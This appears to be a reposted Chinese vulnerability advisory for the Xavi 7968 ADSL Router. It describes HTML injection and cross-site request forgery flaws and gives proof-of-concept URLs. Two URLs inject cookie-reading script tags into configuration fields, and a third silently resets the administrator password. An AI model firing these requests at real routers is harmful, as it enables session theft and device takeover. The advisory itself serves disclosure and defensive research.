发布日期:2012-02-21
更新日期:2012-02-22受影响系统:
Xavi 7968 ADSL Router
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52098Xavi ADSL Router是一款ADSL路由器。Xavi 7968 ADSL Router在实现上存在HTML注入和跨站请求伪造漏洞,攻击者可利用此漏洞执行任意脚本代码、窃取Cookie验证凭证或执行某些管理操作。<*来源:Busindre
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/webconfig/wan/confirm.html/confirm?context=pageAction%3Dadd%26pvcName%3D%2522%253e%253c%252ftd%253e%253cscript%253ealert%28document.cookie%29%253c%252fscript%253e%26vpi%3D0%26vci%3D38%26scat%3DUBR%26accessmode%3Dpppoe%26encap%3Dvcmux%26encapmode%3Dbridged%26iptype%3Ddhcp%26nat_enable%3Dfalse%26def_route_enable%3Dfalse%26qos_enable%3Dfalse%26chkPPPOEAC%3Dfalse%26tBoxPPPOEAC%3DNot%2520Configured%26sessiontype%3Dalways_on%26username%3Da%26password%3Dss&confirm=+Apply+http://www.example.com/webconfig/lan/lan_config.html/local_lan_config?ip_add_txtbox=www.example2.com&sub_mask_txtbox=255.255.255.0&host_name_txtbox=Hack<SCRIPT>alert(document.cookie)</script>&domain_name_txtbox=local.lan&mtu_txtbox=1500&next=Applyhttp://www.example.com/webconfig/admin_passwd/passwd.html/admin_passwd?sySUSErName=1234&sysPassword=12345&sysCfmPwd=12345&cmdSubmit=Apply建议:
--------------------------------------------------------------------------------
厂商补丁:Xavi
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.xavi.com.tw/D-Link DSL-2640B “redpass.cgi”跨站请求伪造漏洞BlackBerry PlayBook Tablet Samba文件共享远程代码执行漏洞相关资讯 Xavi 7968 ADSL Router 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上
|
易网时代-编程资源站